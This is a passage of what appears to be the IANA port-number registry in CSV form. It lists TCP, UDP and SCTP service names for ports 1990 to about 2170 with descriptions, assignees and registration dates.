stun-p1,1990,tcp,cisco STUN Priority 1 port,,,,,,,, stun-p1,1990,udp,cisco STUN Priority 1 port,,,,,,,, stun-p2,1991,tcp,cisco STUN Priority 2 port,,,,,,,, stun-p2,1991,udp,cisco STUN Priority 2 port,,,,,,,, stun-p3,1992,tcp,cisco STUN Priority 3 port,,,,,,,, stun-p3,1992,udp,cisco STUN Priority 3 port,,,,,,,, ipsendmsg,1992,tcp,IPsendmsg,[Bob_Kummerfeld],[Bob_Kummerfeld],,,,,,This entry records an unassigned but widespread use ipsendmsg,1992,udp,IPsendmsg,[Bob_Kummerfeld],[Bob_Kummerfeld],,,,,,This entry records an unassigned but widespread use snmp-tcp-port,1993,tcp,cisco SNMP TCP port,,,,,,,, snmp-tcp-port,1993,udp,cisco SNMP TCP port,,,,,,,, stun-port,1994,tcp,cisco serial tunnel port,,,,,,,, stun-port,1994,udp,cisco serial tunnel port,,,,,,,, perf-port,1995,tcp,cisco perf port,,,,,,,, perf-port,1995,udp,cisco perf port,,,,,,,, tr-rsrb-port,1996,tcp,cisco Remote SRB port,,,,,,,, tr-rsrb-port,1996,udp,cisco Remote SRB port,,,,,,,, gdp-port,1997,tcp,cisco Gateway Discovery Protocol,,,,,,,, gdp-port,1997,udp,cisco Gateway Discovery Protocol,,,,,,,, x25-svc-port,1998,tcp,cisco X.25 service (XOT),,,,,,,, x25-svc-port,1998,udp,cisco X.25 service (XOT),,,,,,,, tcp-id-port,1999,tcp,cisco identification port,,,,,,,, tcp-id-port,1999,udp,cisco identification port,,,,,,,, cisco-sccp,2000,tcp,Cisco SCCP,[Dan_Wing],[Dan_Wing],2003-11,,,,, cisco-sccp,2000,udp,Cisco SCCp,[Dan_Wing],[Dan_Wing],2003-11,,,,, dc,2001,tcp,,,,,,,,, wizard,2001,udp,curry,,,,,,,, globe,2002,tcp,,,,,,,,, globe,2002,udp,,,,,,,,, brutus,2003,tcp,Brutus Server,[Johannes_Skov_Frands],[Johannes_Skov_Frands],2008-02-28,,,,, brutus,2003,udp,Brutus Server,[Johannes_Skov_Frands],[Johannes_Skov_Frands],2008-02-28,,,,, mailbox,2004,tcp,,,,,,,,, emce,2004,udp,CCWS mm conf,,,,,,,, berknet,2005,tcp,,,,,,,,, oracle,2005,udp,,,,,,,,, invokator,2006,tcp,,,,,,,,, raid-cd,2006,udp,raid,,,,,,,, dectalk,2007,tcp,,,,,,,,, raid-am,2007,udp,,,,,,,,, conf,2008,tcp,,,,,,,,, terminaldb,2008,udp,,,,,,,,, news,2009,tcp,,,,,,,,, whosockami,2009,udp,,,,,,,,, search,2010,tcp,,,,,,,,, pipe-server,2010,udp,"IANA assigned this well-formed service name as a replacement for ""pipe_server"".",,,,,,,, pipe_server,2010,udp,,,,,,,,,"This entry is an alias to ""pipe-server"". This entry is now historic, not usable for use with many common service discovery mechanisms." raid-cc,2011,tcp,raid,,,,,,,, servserv,2011,udp,,,,,,,,, ttyinfo,2012,tcp,,,,,,,,, raid-ac,2012,udp,,,,,,,,, raid-am,2013,tcp,,,,,,,,, raid-cd,2013,udp,,,,,,,,, troff,2014,tcp,,,,,,,,, raid-sf,2014,udp,,,,,,,,, cypress,2015,tcp,,,,,,,,, raid-cs,2015,udp,,,,,,,,, bootserver,2016,tcp,,,,,,,,, bootserver,2016,udp,,,,,,,,, cypress-stat,2017,tcp,,,,,,,,, bootclient,2017,udp,,,,,,,,, terminaldb,2018,tcp,,,,,,,,, rellpack,2018,udp,,,,,,,,, whosockami,2019,tcp,,,,,,,,, about,2019,udp,,,,,,,,, xinupageserver,2020,tcp,,,,,,,,, xinupageserver,2020,udp,,,,,,,,, servexec,2021,tcp,,,,,,,,, xinuexpansion1,2021,udp,,,,,,,,, down,2022,tcp,,,,,,,,, xinuexpansion2,2022,udp,,,,,,,,, xinuexpansion3,2023,tcp,,,,,,,,, xinuexpansion3,2023,udp,,,,,,,,, xinuexpansion4,2024,tcp,,,,,,,,, xinuexpansion4,2024,udp,,,,,,,,, ellpack,2025,tcp,,,,,,,,, xribs,2025,udp,,,,,,,,, scrabble,2026,tcp,,,,,,,,, scrabble,2026,udp,,,,,,,,, shadowserver,2027,tcp,,,,,,,,, shadowserver,2027,udp,,,,,,,,, submitserver,2028,tcp,,,,,,,,, submitserver,2028,udp,,,,,,,,, hsrpv6,2029,tcp,Hot Standby Router Protocol IPv6,[Ian_Wilson],[Ian_Wilson],2004-11,,,,, hsrpv6,2029,udp,Hot Standby Router Protocol IPv6,[Ian_Wilson],[Ian_Wilson],2004-11,,,,, device2,2030,tcp,,,,,,,,, device2,2030,udp,,,,,,,,, mobrien-chat,2031,tcp,mobrien-chat,[Mike_O_Brien],[Mike_O_Brien],2004-11,,,,, mobrien-chat,2031,udp,mobrien-chat,[Mike_O_Brien],[Mike_O_Brien],2004-11,,,,, blackboard,2032,tcp,,,,,,,,, blackboard,2032,udp,,,,,,,,, glogger,2033,tcp,,,,,,,,, glogger,2033,udp,,,,,,,,, scoremgr,2034,tcp,,,,,,,,, scoremgr,2034,udp,,,,,,,,, imsldoc,2035,tcp,,,,,,,,, imsldoc,2035,udp,,,,,,,,, e-dpnet,2036,tcp,Ethernet WS DP network,[Peter_Kaever],[Peter_Kaever],2005-08,,,,, e-dpnet,2036,udp,Ethernet WS DP network,[Peter_Kaever],[Peter_Kaever],2005-08,,,,, applus,2037,tcp,APplus Application Server,[Thomas_Boerkel],[Thomas_Boerkel],2008-06-06,,,,,Formerly was P2plus Application Server applus,2037,udp,APplus Application Server,[Thomas_Boerkel],[Thomas_Boerkel],2008-06-06,,,,,Formerly was P2plus Application Server objectmanager,2038,tcp,,,,,,,,, objectmanager,2038,udp,,,,,,,,, prizma,2039,tcp,Prizma Monitoring Service,[Dotan_Ofek],[Dotan_Ofek],2005-12,,,,, prizma,2039,udp,Prizma Monitoring Service,[Dotan_Ofek],[Dotan_Ofek],2005-12,,,,, lam,2040,tcp,,,,,,,,, lam,2040,udp,,,,,,,,, interbase,2041,tcp,,,,,,,,, interbase,2041,udp,,,,,,,,, isis,2042,tcp,isis,,,,,,,, isis,2042,udp,isis,,,,,,,, isis-bcast,2043,tcp,isis-bcast,[Ken_Chapman],[Ken_Chapman],,,,,, isis-bcast,2043,udp,isis-bcast,[Ken_Chapman],[Ken_Chapman],,,,,, rimsl,2044,tcp,,,,,,,,, rimsl,2044,udp,,,,,,,,, cdfunc,2045,tcp,,,,,,,,, cdfunc,2045,udp,,,,,,,,, sdfunc,2046,tcp,,,,,,,,, sdfunc,2046,udp,,,,,,,,, dls,2047,tcp,,,,,,,,, dls,2047,udp,,,,,,,,, dls-monitor,2048,tcp,,,,,,,,, dls-monitor,2048,udp,,,,,,,,, shilp,2049,tcp,,,,,,,,,<== NOTE Conflict on 2049 ! shilp,2049,udp,,,,,,,,,<== NOTE Conflict on 2049 ! nfs,2049,tcp,Network File System - Sun Microsystems,[Brent_Callaghan],[Brent_Callaghan],,,,,,Defined TXT keys: path= nfs,2049,udp,Network File System - Sun Microsystems,[Brent_Callaghan],[Brent_Callaghan],,,,,,Defined TXT keys: path= nfs,2049,sctp,Network File System,,,,,[RFC5665],,,Defined TXT keys: path= av-emb-config,2050,tcp,Avaya EMB Config Port,[John_Yeager],[John_Yeager],,,,,, av-emb-config,2050,udp,Avaya EMB Config Port,[John_Yeager],[John_Yeager],,,,,, epnsdp,2051,tcp,EPNSDP,[Hiroyasu_Ogata],[Hiroyasu_Ogata],,,,,, epnsdp,2051,udp,EPNSDP,[Hiroyasu_Ogata],[Hiroyasu_Ogata],,,,,, clearvisn,2052,tcp,clearVisn Services Port,[Dave_Lyons],[Dave_Lyons],,,,,, clearvisn,2052,udp,clearVisn Services Port,[Dave_Lyons],[Dave_Lyons],,,,,, lot105-ds-upd,2053,tcp,Lot105 DSuper Updates,[Piers_Scannell],[Piers_Scannell],,,,,, lot105-ds-upd,2053,udp,Lot105 DSuper Updates,[Piers_Scannell],[Piers_Scannell],,,,,, weblogin,2054,tcp,Weblogin Port,[Diego_Saravia],[Diego_Saravia],,,,,, weblogin,2054,udp,Weblogin Port,[Diego_Saravia],[Diego_Saravia],,,,,, iop,2055,tcp,Iliad-Odyssey Protocol,[Bruce_Lueckenhoff],[Bruce_Lueckenhoff],,,,,, iop,2055,udp,Iliad-Odyssey Protocol,[Bruce_Lueckenhoff],[Bruce_Lueckenhoff],,,,,, omnisky,2056,tcp,OmniSky Port,[Oren_Hurvitz],[Oren_Hurvitz],,,,,, omnisky,2056,udp,OmniSky Port,[Oren_Hurvitz],[Oren_Hurvitz],,,,,, rich-cp,2057,tcp,Rich Content Protocol,[Ronen_Vainish],[Ronen_Vainish],,,,,, rich-cp,2057,udp,Rich Content Protocol,[Ronen_Vainish],[Ronen_Vainish],,,,,, newwavesearch,2058,tcp,NewWaveSearchables RMI,[Thomas_Kerkau],[Thomas_Kerkau],,,,,, newwavesearch,2058,udp,NewWaveSearchables RMI,[Thomas_Kerkau],[Thomas_Kerkau],,,,,, bmc-messaging,2059,tcp,BMC Messaging Service,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-messaging,2059,udp,BMC Messaging Service,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, teleniumdaemon,2060,tcp,Telenium Daemon IF,[Nick_Woronuk],[Nick_Woronuk],,,,,, teleniumdaemon,2060,udp,Telenium Daemon IF,[Nick_Woronuk],[Nick_Woronuk],,,,,, netmount,2061,tcp,NetMount,[Alex_Oberlander],[Alex_Oberlander],,,,,, netmount,2061,udp,NetMount,[Alex_Oberlander],[Alex_Oberlander],,,,,, icg-swp,2062,tcp,ICG SWP Port,,,,,,,, icg-swp,2062,udp,ICG SWP Port,,,,,,,, icg-bridge,2063,tcp,ICG Bridge Port,,,,,,,, icg-bridge,2063,udp,ICG Bridge Port,,,,,,,, icg-iprelay,2064,tcp,ICG IP Relay Port,[Steve_Quintana],[Steve_Quintana],,,,,, icg-iprelay,2064,udp,ICG IP Relay Port,[Steve_Quintana],[Steve_Quintana],,,,,, dlsrpn,2065,tcp,Data Link Switch Read Port Number,[Amir_Peless],[Amir_Peless],,,,,, dlsrpn,2065,udp,Data Link Switch Read Port Number,[Amir_Peless],[Amir_Peless],,,,,, aura,2066,tcp,AVM USB Remote Architecture,[Diego_Friedel],[Diego_Friedel],2006-03,,,,, aura,2066,udp,AVM USB Remote Architecture,[Diego_Friedel],[Diego_Friedel],2006-03,,,,, dlswpn,2067,tcp,Data Link Switch Write Port Number,[Amir_Peless],[Amir_Peless],,,,,, dlswpn,2067,udp,Data Link Switch Write Port Number,[Amir_Peless],[Amir_Peless],,,,,, avauthsrvprtcl,2068,tcp,Avocent AuthSrv Protocol,[Steven_W_Clark_2],[Steven_W_Clark_2],,,,,, avauthsrvprtcl,2068,udp,Avocent AuthSrv Protocol,[Steven_W_Clark_2],[Steven_W_Clark_2],,,,,, event-port,2069,tcp,HTTP Event Port,[Larry_Emlich],[Larry_Emlich],,,,,, event-port,2069,udp,HTTP Event Port,[Larry_Emlich],[Larry_Emlich],,,,,, ah-esp-encap,2070,tcp,AH and ESP Encapsulated in UDP packet,[Amy_Weaver],[Amy_Weaver],,,,,, ah-esp-encap,2070,udp,AH and ESP Encapsulated in UDP packet,[Amy_Weaver],[Amy_Weaver],,,,,, acp-port,2071,tcp,Axon Control Protocol,[Christiaan_Simons],[Christiaan_Simons],,,,,, acp-port,2071,udp,Axon Control Protocol,[Christiaan_Simons],[Christiaan_Simons],,,,,, msync,2072,tcp,GlobeCast mSync,[Piers_Scannell_2],[Piers_Scannell_2],,,,,, msync,2072,udp,GlobeCast mSync,[Piers_Scannell_2],[Piers_Scannell_2],,,,,, gxs-data-port,2073,tcp,DataReel Database Socket,[Douglas_M_Gaer],[Douglas_M_Gaer],,,,,, gxs-data-port,2073,udp,DataReel Database Socket,[Douglas_M_Gaer],[Douglas_M_Gaer],,,,,, vrtl-vmf-sa,2074,tcp,Vertel VMF SA,[Alan_Akahoshi],[Alan_Akahoshi],,,,,, vrtl-vmf-sa,2074,udp,Vertel VMF SA,[Alan_Akahoshi],[Alan_Akahoshi],,,,,, newlixengine,2075,tcp,Newlix ServerWare Engine,,,,,,,, newlixengine,2075,udp,Newlix ServerWare Engine,,,,,,,, newlixconfig,2076,tcp,Newlix JSPConfig,[Jean_Serge_Gagnon],[Jean_Serge_Gagnon],,,,,, newlixconfig,2076,udp,Newlix JSPConfig,[Jean_Serge_Gagnon],[Jean_Serge_Gagnon],,,,,, tsrmagt,2077,tcp,Old Tivoli Storage Manager,,,,,,,, tsrmagt,2077,udp,Old Tivoli Storage Manager,,,,,,,, tpcsrvr,2078,tcp,IBM Total Productivity Center Server,[Justin_R_Bendich],[Justin_R_Bendich],,,,,, tpcsrvr,2078,udp,IBM Total Productivity Center Server,[Justin_R_Bendich],[Justin_R_Bendich],,,,,, idware-router,2079,tcp,IDWARE Router Port,[Zdenek_Kolba],[Zdenek_Kolba],,,,,, idware-router,2079,udp,IDWARE Router Port,[Zdenek_Kolba],[Zdenek_Kolba],,,,,, autodesk-nlm,2080,tcp,Autodesk NLM (FLEXlm),[Greg_Suppes],[Greg_Suppes],,,,,, autodesk-nlm,2080,udp,Autodesk NLM (FLEXlm),[Greg_Suppes],[Greg_Suppes],,,,,, kme-trap-port,2081,tcp,KME PRINTER TRAP PORT,[Masakatsu_Matsuo],[Masakatsu_Matsuo],,,,,, kme-trap-port,2081,udp,KME PRINTER TRAP PORT,[Masakatsu_Matsuo],[Masakatsu_Matsuo],,,,,, infowave,2082,tcp,Infowave Mobility Server,[Kaz_Kylheku],[Kaz_Kylheku],,,,,, infowave,2082,udp,Infowave Mobility Server,[Kaz_Kylheku],[Kaz_Kylheku],,,,,, radsec,2083,tcp,Secure Radius Service,[IESG],[IETF_Chair],2005-05,,[RFC6614],,,"The TCP port 2083 was already previously assigned by IANA for ""RadSec"", an early implementation of RADIUS/TLS, prior to issuance of this RFC. This early implementation can be configured to be compatible to RADIUS/TLS as specified by the IETF. See [RFC6614], Appendix A for details." radsec,2083,udp,Secure Radius Service,[Mike_McCauley],[Mike_McCauley],2005-05,,,,, sunclustergeo,2084,tcp,SunCluster Geographic,[Oracle_2],[Steve_McKinty],2005-11,2013-08-14,,,, sunclustergeo,2084,udp,SunCluster Geographic,[Oracle_2],[Steve_McKinty],2005-11,2013-08-14,,,, ada-cip,2085,tcp,ADA Control,[Eugene_Frenkel],[Eugene_Frenkel],2005-11,,,,, ada-cip,2085,udp,ADA Control,[Eugene_Frenkel],[Eugene_Frenkel],2005-11,,,,, gnunet,2086,tcp,GNUnet,[Christian_Grothoff],[Christian_Grothoff],2002-10,,,,, gnunet,2086,udp,GNUnet,[Christian_Grothoff],[Christian_Grothoff],2002-10,,,,, eli,2087,tcp,ELI - Event Logging Integration,[Maya_Zimerman],[Maya_Zimerman],,,,,, eli,2087,udp,ELI - Event Logging Integration,[Maya_Zimerman],[Maya_Zimerman],,,,,, ip-blf,2088,tcp,IP Busy Lamp Field,[Jeffrey_Szczepanski],[Jeffrey_Szczepanski],2005-02,,,,, ip-blf,2088,udp,IP Busy Lamp Field,[Jeffrey_Szczepanski],[Jeffrey_Szczepanski],2005-02,,,,, sep,2089,tcp,Security Encapsulation Protocol - SEP,[Maya_Zimerman],[Maya_Zimerman],,,,,, sep,2089,udp,Security Encapsulation Protocol - SEP,[Maya_Zimerman],[Maya_Zimerman],,,,,, lrp,2090,tcp,Load Report Protocol,[Amir_Peless],[Amir_Peless],,,,,, lrp,2090,udp,Load Report Protocol,[Amir_Peless],[Amir_Peless],,,,,, prp,2091,tcp,PRP,[Amir_Peless],[Amir_Peless],,,,,, prp,2091,udp,PRP,[Amir_Peless],[Amir_Peless],,,,,, descent3,2092,tcp,Descent 3,[Kevin_Bentley],[Kevin_Bentley],,,,,, descent3,2092,udp,Descent 3,[Kevin_Bentley],[Kevin_Bentley],,,,,, nbx-cc,2093,tcp,NBX CC,,,,,,,, nbx-cc,2093,udp,NBX CC,,,,,,,, nbx-au,2094,tcp,NBX AU,,,,,,,, nbx-au,2094,udp,NBX AU,,,,,,,, nbx-ser,2095,tcp,NBX SER,,,,,,,, nbx-ser,2095,udp,NBX SER,,,,,,,, nbx-dir,2096,tcp,NBX DIR,[Henry_Houh],[Henry_Houh],,,,,, nbx-dir,2096,udp,NBX DIR,[Henry_Houh],[Henry_Houh],,,,,, jetformpreview,2097,tcp,Jet Form Preview,[Zygmunt_Wiercioch],[Zygmunt_Wiercioch],,,,,, jetformpreview,2097,udp,Jet Form Preview,[Zygmunt_Wiercioch],[Zygmunt_Wiercioch],,,,,, dialog-port,2098,tcp,Dialog Port,[Joseph_Mathew],[Joseph_Mathew],,,,,, dialog-port,2098,udp,Dialog Port,[Joseph_Mathew],[Joseph_Mathew],,,,,, h2250-annex-g,2099,tcp,H.225.0 Annex G Signalling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h2250-annex-g,2099,udp,H.225.0 Annex G Signalling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, amiganetfs,2100,tcp,Amiga Network Filesystem,[Rudi_Chiarito],[Rudi_Chiarito],,,,,, amiganetfs,2100,udp,Amiga Network Filesystem,[Rudi_Chiarito],[Rudi_Chiarito],,,,,, rtcm-sc104,2101,tcp,rtcm-sc104,[Wolfgang_Rupprecht],[Wolfgang_Rupprecht],,,,,, rtcm-sc104,2101,udp,rtcm-sc104,[Wolfgang_Rupprecht],[Wolfgang_Rupprecht],,,,,, zephyr-srv,2102,tcp,Zephyr server,,,,,,,, zephyr-srv,2102,udp,Zephyr server,,,,,,,, zephyr-clt,2103,tcp,Zephyr serv-hm connection,,,,,,,, zephyr-clt,2103,udp,Zephyr serv-hm connection,,,,,,,, zephyr-hm,2104,tcp,Zephyr hostmanager,[Greg_Hudson],[Greg_Hudson],,,,,, zephyr-hm,2104,udp,Zephyr hostmanager,[Greg_Hudson],[Greg_Hudson],,,,,, minipay,2105,tcp,MiniPay,[Amir_Herzberg],[Amir_Herzberg],,,,,, minipay,2105,udp,MiniPay,[Amir_Herzberg],[Amir_Herzberg],,,,,, mzap,2106,tcp,MZAP,[Dave_Thaler_2],[Dave_Thaler_2],,,,,, mzap,2106,udp,MZAP,[Dave_Thaler_2],[Dave_Thaler_2],,,,,, bintec-admin,2107,tcp,BinTec Admin,[Thomas_Schmidt],[Thomas_Schmidt],,,,,, bintec-admin,2107,udp,BinTec Admin,[Thomas_Schmidt],[Thomas_Schmidt],,,,,, comcam,2108,tcp,Comcam,[Don_Gilbreath],[Don_Gilbreath],,,,,, comcam,2108,udp,Comcam,[Don_Gilbreath],[Don_Gilbreath],,,,,, ergolight,2109,tcp,Ergolight,[Jindra_Ryvola],[Jindra_Ryvola],,,,,, ergolight,2109,udp,Ergolight,[Jindra_Ryvola],[Jindra_Ryvola],,,,,, umsp,2110,tcp,UMSP,[Alexander_Bogdanov_2],[Alexander_Bogdanov_2],,,,,, umsp,2110,udp,UMSP,[Alexander_Bogdanov_2],[Alexander_Bogdanov_2],,,,,, dsatp,2111,tcp,OPNET Dynamic Sampling Agent Transaction Protocol,[OPNET_Technologies_Inc],[Edward_Macomber],,2011-09-21,,,, dsatp,2111,udp,OPNET Dynamic Sampling Agent Transaction Protocol,[OPNET_Technologies_Inc],[Edward_Macomber],,2011-09-21,,,, idonix-metanet,2112,tcp,Idonix MetaNet,[Paul_Harrison],[Paul_Harrison],,,,,, idonix-metanet,2112,udp,Idonix MetaNet,[Paul_Harrison],[Paul_Harrison],,,,,, hsl-storm,2113,tcp,HSL StoRM,[Jost_Faganel],[Jost_Faganel],,,,,, hsl-storm,2113,udp,HSL StoRM,[Jost_Faganel],[Jost_Faganel],,,,,, newheights,2114,tcp,NEWHEIGHTS,[Michael_Levy],[Michael_Levy],,,,,, newheights,2114,udp,NEWHEIGHTS,[Michael_Levy],[Michael_Levy],,,,,, kdm,2115,tcp,Key Distribution Manager,[Mike_Little],[Mike_Little],,,,,, kdm,2115,udp,Key Distribution Manager,[Mike_Little],[Mike_Little],,,,,, ccowcmr,2116,tcp,CCOWCMR,[Mark_Morwood],[Mark_Morwood],,,,,, ccowcmr,2116,udp,CCOWCMR,[Mark_Morwood],[Mark_Morwood],,,,,, mentaclient,2117,tcp,MENTACLIENT,,,,,,,, mentaclient,2117,udp,MENTACLIENT,,,,,,,, mentaserver,2118,tcp,MENTASERVER,[Ilan_Shlosberg],[Ilan_Shlosberg],,,,,, mentaserver,2118,udp,MENTASERVER,[Ilan_Shlosberg],[Ilan_Shlosberg],,,,,, gsigatekeeper,2119,tcp,GSIGATEKEEPER,[Steve_Tuecke],[Steve_Tuecke],,,,,, gsigatekeeper,2119,udp,GSIGATEKEEPER,[Steve_Tuecke],[Steve_Tuecke],,,,,, qencp,2120,tcp,Quick Eagle Networks CP,[Santa_Dasu],[Santa_Dasu],,,,,, qencp,2120,udp,Quick Eagle Networks CP,[Santa_Dasu],[Santa_Dasu],,,,,, scientia-ssdb,2121,tcp,SCIENTIA-SSDB,[SYSTEMS_MANAGER],[SYSTEMS_MANAGER],,,,,, scientia-ssdb,2121,udp,SCIENTIA-SSDB,[SYSTEMS_MANAGER],[SYSTEMS_MANAGER],,,,,, caupc-remote,2122,tcp,CauPC Remote Control,[Environics_Oy],[Environics_Oy],,,,,, caupc-remote,2122,udp,CauPC Remote Control,[Environics_Oy],[Environics_Oy],,,,,, gtp-control,2123,tcp,GTP-Control Plane (3GPP),[Alessio_Casati],[Alessio_Casati],,,,,, gtp-control,2123,udp,GTP-Control Plane (3GPP),[Alessio_Casati],[Alessio_Casati],,,,,, elatelink,2124,tcp,ELATELINK,[Tim_Lawrence],[Tim_Lawrence],,,,,, elatelink,2124,udp,ELATELINK,[Tim_Lawrence],[Tim_Lawrence],,,,,, lockstep,2125,tcp,LOCKSTEP,[Karl_Forster],[Karl_Forster],,,,,, lockstep,2125,udp,LOCKSTEP,[Karl_Forster],[Karl_Forster],,,,,, pktcable-cops,2126,tcp,PktCable-COPS,[Glenn_Russell],[Glenn_Russell],,,,,, pktcable-cops,2126,udp,PktCable-COPS,[Glenn_Russell],[Glenn_Russell],,,,,, index-pc-wb,2127,tcp,INDEX-PC-WB,[James_David_Fisher],[James_David_Fisher],,,,,, index-pc-wb,2127,udp,INDEX-PC-WB,[James_David_Fisher],[James_David_Fisher],,,,,, net-steward,2128,tcp,Net Steward Control,[Martin_Norman],[Martin_Norman],,,,,, net-steward,2128,udp,Net Steward Control,[Martin_Norman],[Martin_Norman],,,,,, cs-live,2129,tcp,cs-live.com,[Matt_Lachance],[Matt_Lachance],,,,,, cs-live,2129,udp,cs-live.com,[Matt_Lachance],[Matt_Lachance],,,,,, xds,2130,tcp,XDS,[Peter_Zurich],[Peter_Zurich],,,,,, xds,2130,udp,XDS,[Peter_Zurich],[Peter_Zurich],,,,,, avantageb2b,2131,tcp,Avantageb2b,[Avi_Software],[Avi_Software],,,,,, avantageb2b,2131,udp,Avantageb2b,[Avi_Software],[Avi_Software],,,,,, solera-epmap,2132,tcp,SoleraTec End Point Map,[Mark_Armstrong],[Mark_Armstrong],,,,,, solera-epmap,2132,udp,SoleraTec End Point Map,[Mark_Armstrong],[Mark_Armstrong],,,,,, zymed-zpp,2133,tcp,ZYMED-ZPP,[Gregg_Welker],[Gregg_Welker],,,,,, zymed-zpp,2133,udp,ZYMED-ZPP,[Gregg_Welker],[Gregg_Welker],,,,,, avenue,2134,tcp,AVENUE,[Jason_Cater],[Jason_Cater],,,,,, avenue,2134,udp,AVENUE,[Jason_Cater],[Jason_Cater],,,,,, gris,2135,tcp,Grid Resource Information Server,[Steve_Tuecke],[Steve_Tuecke],,,,,, gris,2135,udp,Grid Resource Information Server,[Steve_Tuecke],[Steve_Tuecke],,,,,, appworxsrv,2136,tcp,APPWORXSRV,[Fred_McLain],[Fred_McLain],,,,,, appworxsrv,2136,udp,APPWORXSRV,[Fred_McLain],[Fred_McLain],,,,,, connect,2137,tcp,CONNECT,[Reid_Ligon],[Reid_Ligon],,,,,, connect,2137,udp,CONNECT,[Reid_Ligon],[Reid_Ligon],,,,,, unbind-cluster,2138,tcp,UNBIND-CLUSTER,[Francois_Harvey],[Francois_Harvey],,,,,, unbind-cluster,2138,udp,UNBIND-CLUSTER,[Francois_Harvey],[Francois_Harvey],,,,,, ias-auth,2139,tcp,IAS-AUTH,,,,,,,, ias-auth,2139,udp,IAS-AUTH,,,,,,,, ias-reg,2140,tcp,IAS-REG,,,,,,,, ias-reg,2140,udp,IAS-REG,,,,,,,, ias-admind,2141,tcp,IAS-ADMIND,[Baiju_V_Patel],[Baiju_V_Patel],,,,,, ias-admind,2141,udp,IAS-ADMIND,[Baiju_V_Patel],[Baiju_V_Patel],,,,,, tdmoip,2142,tcp,TDM OVER IP,,,,,[RFC5087],,, tdmoip,2142,udp,TDM OVER IP,,,,,[RFC5087],,, lv-jc,2143,tcp,Live Vault Job Control,,,,,,,, lv-jc,2143,udp,Live Vault Job Control,,,,,,,, lv-ffx,2144,tcp,Live Vault Fast Object Transfer,,,,,,,, lv-ffx,2144,udp,Live Vault Fast Object Transfer,,,,,,,, lv-pici,2145,tcp,Live Vault Remote Diagnostic Console Support,,,,,,,, lv-pici,2145,udp,Live Vault Remote Diagnostic Console Support,,,,,,,, lv-not,2146,tcp,Live Vault Admin Event Notification,,,,,,,, lv-not,2146,udp,Live Vault Admin Event Notification,,,,,,,, lv-auth,2147,tcp,Live Vault Authentication,[Ted_Hess],[Ted_Hess],,,,,, lv-auth,2147,udp,Live Vault Authentication,[Ted_Hess],[Ted_Hess],,,,,, veritas-ucl,2148,tcp,VERITAS UNIVERSAL COMMUNICATION LAYER,[Songlin_Ren],[Songlin_Ren],,,,,, veritas-ucl,2148,udp,VERITAS UNIVERSAL COMMUNICATION LAYER,[Songlin_Ren],[Songlin_Ren],,,,,, acptsys,2149,tcp,ACPTSYS,[Michael_Lekias],[Michael_Lekias],,,,,, acptsys,2149,udp,ACPTSYS,[Michael_Lekias],[Michael_Lekias],,,,,, dynamic3d,2150,tcp,DYNAMIC3D,[Tobias_Wegner],[Tobias_Wegner],,,,,, dynamic3d,2150,udp,DYNAMIC3D,[Tobias_Wegner],[Tobias_Wegner],,,,,, docent,2151,tcp,DOCENT,[Hali_Lindbloom],[Hali_Lindbloom],,,,,, docent,2151,udp,DOCENT,[Hali_Lindbloom],[Hali_Lindbloom],,,,,, gtp-user,2152,tcp,GTP-User Plane (3GPP),[Alessio_Casati],[Alessio_Casati],,,,,, gtp-user,2152,udp,GTP-User Plane (3GPP),[Alessio_Casati],[Alessio_Casati],,,,,, ctlptc,2153,tcp,Control Protocol,,,,,,,, ctlptc,2153,udp,Control Protocol,,,,,,,, stdptc,2154,tcp,Standard Protocol,,,,,,,, stdptc,2154,udp,Standard Protocol,,,,,,,, brdptc,2155,tcp,Bridge Protocol,[Hideki_Hatta],[Hideki_Hatta],2007-09-27,,,,, brdptc,2155,udp,Bridge Protocol,[Hideki_Hatta],[Hideki_Hatta],2007-09-27,,,,, trp,2156,tcp,Talari Reliable Protocol,[John_E_Dickey],[John_E_Dickey],2007-09-27,,,,, trp,2156,udp,Talari Reliable Protocol,[John_E_Dickey],[John_E_Dickey],2007-09-27,,,,, xnds,2157,tcp,Xerox Network Document Scan Protocol,[William_R_Lear],[William_R_Lear],2008-03-06,,,,, xnds,2157,udp,Xerox Network Document Scan Protocol,[William_R_Lear],[William_R_Lear],2008-03-06,,,,, touchnetplus,2158,tcp,TouchNetPlus Service,[Brian_Toothill],[Brian_Toothill],2008-03-06,,,,, touchnetplus,2158,udp,TouchNetPlus Service,[Brian_Toothill],[Brian_Toothill],2008-03-06,,,,, gdbremote,2159,tcp,GDB Remote Debug Port,[Nigel_Stephens],[Nigel_Stephens],,,,,, gdbremote,2159,udp,GDB Remote Debug Port,[Nigel_Stephens],[Nigel_Stephens],,,,,, apc-2160,2160,tcp,APC 2160,[American_Power_Conve],[American_Power_Conve],,,,,, apc-2160,2160,udp,APC 2160,[American_Power_Conve],[American_Power_Conve],,,,,, apc-2161,2161,tcp,APC 2161,[American_Power_Conve],[American_Power_Conve],,,,,, apc-2161,2161,udp,APC 2161,[American_Power_Conve],[American_Power_Conve],,,,,, navisphere,2162,tcp,Navisphere,,,,,,,, navisphere,2162,udp,Navisphere,,,,,,,, navisphere-sec,2163,tcp,Navisphere Secure,[Andreas_Bauer],[Andreas_Bauer],,,,,, navisphere-sec,2163,udp,Navisphere Secure,[Andreas_Bauer],[Andreas_Bauer],,,,,, ddns-v3,2164,tcp,Dynamic DNS Version 3,[Alan_Yates],[Alan_Yates],,,,,, ddns-v3,2164,udp,Dynamic DNS Version 3,[Alan_Yates],[Alan_Yates],,,,,, x-bone-api,2165,tcp,X-Bone API,[Joe_Touch],[Joe_Touch],,,,,, x-bone-api,2165,udp,X-Bone API,[Joe_Touch],[Joe_Touch],,,,,, iwserver,2166,tcp,iwserver,[Fred_Surr],[Fred_Surr],,,,,, iwserver,2166,udp,iwserver,[Fred_Surr],[Fred_Surr],,,,,, raw-serial,2167,tcp,Raw Async Serial Link,[Benjamin_Green],[Benjamin_Green],,,,,, raw-serial,2167,udp,Raw Async Serial Link,[Benjamin_Green],[Benjamin_Green],,,,,, easy-soft-mux,2168,tcp,easy-soft Multiplexer,[Norbert_Kintzler],[Norbert_Kintzler],2004-11,,,,, easy-soft-mux,2168,udp,easy-soft Multiplexer,[Norbert_Kintzler],[Norbert_Kintzler],2004-11,,,,, brain,2169,tcp,Backbone for Academic Information Notification (BRAIN),[Archishmat_Gore],[Archishmat_Gore],2004-11,,,,, brain,2169,udp,Backbone for Academic Information Notification (BRAIN),[Archishmat_Gore],[Archishmat_Gore],2004-11,,,,, eyetv,2170,tcp,EyeTV Server 